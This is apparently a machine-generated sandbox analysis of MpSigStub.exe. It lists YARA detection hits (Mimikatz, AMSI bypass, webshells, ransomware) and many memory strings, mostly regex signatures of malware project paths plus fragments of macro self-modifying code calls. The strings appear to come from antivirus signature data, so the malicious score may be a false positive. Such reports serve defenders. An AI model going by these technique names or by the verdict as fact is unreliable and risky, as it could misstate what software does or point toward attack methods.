Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: IronPanda_Malware_Htran date = 2015-09-16, author = Florian Roth, description = Iron Panda Malware Htran, reference = https://goo.gl/E4qia9, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe

File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4

Jump to behavior

Source: mpavdlta.vdm.34.dr	Static PE information: No import functions for PE file found
Source: mpavbase.vdm.35.dr	Static PE information: No import functions for PE file found
Source: mpasbase.vdm.35.dr	Static PE information: No import functions for PE file found
Source: mpasdlta.vdm.34.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\wevtutil.exe

Process token adjusted: Security

Source: mpasdlta.vdm.34.dr	Static PE information: Section: .rsrc ZLIB complexity 0.999074201542
Source: mpavdlta.vdm.34.dr	Static PE information: Section: .rsrc ZLIB complexity 0.996293048469

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@12/14@4/3

Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Binary or memory string: winhost.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: -(.+\\.+Cal.*smalar\\FlooDer\\FLooDeR.vbp
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	Binary or memory string: /.+:\\.+\\fuckADX\\.+\\ADs.\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	Binary or memory string: dTP*\AD:\Master\ADWARA_NEW\idle_componet.vbpd
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: *\AC:\Users\Admin\Desktop\other_cr\R_PE\2201\_CLC.vbp
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: .+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: 0+.+\\mywisdom\\asian_scandal.+\\ngentot.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: .+\\Hell Packer.+\\gregstubs\\HEX\\HEX\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: D:\\Wu Tong\\Softwares&Codes\\.*\\Locker\.vbp
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	Binary or memory string: .+:\\aw1\\Etmscztha.vbp
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: \pekalongan.vbp
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: *\AD:\Documents\Documents11\Secret\Basic\Update\Worm+Trojan\worm.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: vD:\virustrojan\harpotinfeksiexe\harpotinfeksiexe\SERVER.VBP
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: ,'Scylla Botnet.+\\Server\\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: \\Explorador-Remoto\\Servidor.vbp
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: R\baixando5link\baixando5link\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: .+\\L1Crpt_src\\ScantimeCrypter\\stub\\Stub.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: C:\\Documents and Settings\\Administrador\\Mis documentos\\.+\\Nueva carpeta\\###################################################################################################################################.vbp
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Binary or memory string: z1.vbp]
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: f\MurdeR\Escritorio\Desktop\cypter\stub\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	Binary or memory string: TOC:\\Documents and Settings\\astronalta\\Meus documentos\\.+\\LOAD_GEAR\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	Binary or memory string: prjGenerator.vbp
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: 0+.+:\\.NOVO.+\\BLINDADO\\PluginBrada..vbp
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: @\Hugo Tools\DRONES\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: V\Stuffs\w32.AntiAnarchy.E@mm\Havoc.Worm.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: '".+\\Virus Maker\\s1\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	Binary or memory string: E:\\kaynak( Kod\|~1)\\spynma(il_Merged\|~1).+?\.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: /*.+\\Viruses\\Black Project\\Dark_Love.vbp
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: 0.vbp
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: @*\AY:\zeus\downloadersource\My_Crypter_vbcrypter\vbcrypter\newStubMy\myprog.vbp
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	Binary or memory string: Z*\AE:\Stuff\Lilith Premium\Start\Projekt1.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: &!C:\\.+\\www.microfost.com -3.vbp
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	Binary or memory string: C:\\(DOCUME~1\|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win\|wix\|WS86).+?\.vbp
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: 4/:\\.+\\mStubmmmm\\Backup-.+\\Backup-.+\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	Binary or memory string: .VBProjects
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	Binary or memory string: phapoeskeezm.vbp
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	Binary or memory string: *\AD:\Lap Trinh\Virus Mau\Pro 3\Pro3.vbp
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	Binary or memory string: .+:\\.\\MicroApp.\\MicroProCon\\MicrostCon.vbp
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: @\Polifemo Ebrio Crypter\Stub.vbp
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	Binary or memory string: 72E:\\kaynak( Kod\|~1)\\spynma(il_Merged\|~1).+?\.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: D:\\.{15}\\WEBPNT\\WebpNt\.vBp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+Hack\\.+\\inject\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: OJ.+:\\Documents and Settings\\Administrador\\Desktop\\LOAD.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	Binary or memory string: \RenoNevada\MainMango\Server.vbp
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: \IELOCK.VBP
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: MSVBVM60.DLLd \DBSpy\DBSpy.vbp
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: \CEF\VBBHO.vbp
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: .+:\\.NOVO.+\\BLINDADO\\PluginBrada..vbp
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: .+:\\clean ppi\\temp\\.+\\DownloadBinary.vbp
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: GB.+:\\.+\\NovissimoVBLoaderFILE.*\\NovissimoVBLoader\\Prg_Flex.vbp
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: '".+:\\Obfuscated.*\\unapubvelr.vbp
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString]
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	Binary or memory string: \MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	Binary or memory string: 61.+:\\.\\MicroApp.\\MicroProCon\\MicrostCon.vbp
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	Binary or memory string: C:\\Documents and Settings\\astronalta\\Meus documentos\\.+\\LOAD_GEAR\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	Binary or memory string: C:\NuAT.vbp]
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: :\\.+\\Bkoli Hazm\\Lostdoor.+\\Client.+\\Helminth_Project.vbp
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: PAJ:\MASTER\bb_soft\bb_promo\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	Binary or memory string: p\new2911.vbp
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: >\legal notice viri\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: bho\VBBHO.vbp
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: worm2007.vbp
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: .+\\Cryptosy\\Stub\\Stub.vbp
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	Binary or memory string: 1ocuments and Settings\Usuario\1scritorio\Ex\Ex.vbp]
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: .+:\\SoUrCe.!\\.SOURC.*\\PrjMain.vbp
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: AC:\Atari.vbp
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: 2\Clemis-Gay\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Binary or memory string: PProgramKecil\SetanWare\LWDay.2\LWDay.vbp
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: .+\\(BotSupho Compiler\|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: \REeB.vbp
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: D:\\.+\\.+fcx\\.+1.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: J*\AD:\Master\ADWARA_NEW\bho\VBBHO.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: JE.+:\\backup 20##11\\bank\\Pharming\\Projeto VB\\Project1.NET\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: ,Z:\a_new_dll\VIVAX.vbp]
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	Binary or memory string: 2sharK\Server\Projekt1.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter]
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	Binary or memory string: ^Systema So as ipanema tem\INSTALL\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: J\MSLoad.VB.Keylogger.Project\DOWN.vbp
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Binary or memory string: :\captura\joinner\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: = NormalTemplate.VBProject.VBComponents(1).CodeModule
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: :\\Jhocko\\Loader\\Loader.vbp
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\NovissimoVBLoaderFILE.*\\NovissimoVBLoader\\Prg_Flex.vbp
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	Binary or memory string: .+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: H\Users\User\Desktop\hta\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	Binary or memory string: ^\ie.vbp
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: C:\\Games\\.*\\Crypter\\Crypter Source\\Stub\\Project1\.vbp
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: .+Evoloution\\Server\\Server\.vbp
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: D:\\Setup\\Drivers\\Audio\\Installs_the_RealTek_AC_97_audio_driver\\WDM5630\\Documents\\Documents11\\Secret\\Basic\\Updated\\Dao chich\\final 007 spy\\.+\.vbp
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	Binary or memory string: C:\\Documents and Settings\\uko\\Desktop\\PRIMO\\NOVOLOAD.*\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	Binary or memory string: *\AC:\Users\SqUeEzEr\Desktop\OPENSC CODES FROM ME\Downloader\.vbp
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)]
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: .+:\\Apub\\Cyfjrvepg.vbp
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	Binary or memory string: 0MicroProCon\MicroCon.vbp
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	Binary or memory string: >9C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Binary or memory string: ,\Asmahani\Asmahani.vbp
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	Binary or memory string: lgC:\\(DOCUME~1\|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win\|wix\|WS86).+?\.vbp
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: &Desktop\ery\ery.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: .+\\Abdallah\\.+\\iCrypt2.+\\stub_resources\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: .+\\mStubmmmm\\Backup.+\\lSUpRQlvPd.vbp
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: :\\.+\\mStubmmmm\\Backup-.+\\Backup-.+\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: 50.+\\L1Crpt_src\\ScantimeCrypter\\stub\\Stub.vbp
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	Binary or memory string: bradesco.vbp
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	Binary or memory string: RF:\vb\VISUAL BASIC\VARIOS\teuer\Teuer.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: +&.+:\\.+Hack\\.+\\inject\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: 6\NotPHP +RSRC SQlite\sm.vbp
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: Safety.vbp
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	Binary or memory string: 4\MicroProCon\SeconFile.vbp
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	Binary or memory string: 2-.+:\\clean ppi\\temp\\.+\\DownloadBinary.vbp
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	Binary or memory string: OJC:\\Documents and Settings\\uko\\Desktop\\PRIMO\\NOVOLOAD.*\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	Binary or memory string: ,:\revolucao\SysBox.vbpax
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	Binary or memory string: @*\AD:\Master\ADWARA_NEW\codec\Codec.vbp
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: 3.D:\\Wu Tong\\Softwares&Codes\\.*\\Locker\.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: ;6.+:\\.+\\Kraken\\Escritorio.+\\descarga\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	Binary or memory string: C:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: ~A*\AE:\ExeNew\ExeSyVbNew3\ExeSyVb\ExeClientOld360\ExeClient.vbp
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: A<C:\\Games\\.*\\Crypter\\Crypter Source\\Stub\\Project1\.vbp
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	Binary or memory string: \trash\VB\Bus_dest\bus_des2.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: \Revolta.vbp
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Binary or memory string: T@*\AC:\Dan\sources\RAT Server\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: .+\\.+Cal.*smalar\\FlooDer\\FLooDeR.vbp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Desktop\\Codes\\Registro dll\\RegistroDll.vbp
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	Binary or memory string: C:.+\\IJEFJIJEFGIJE.vbp
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: 1.vbp
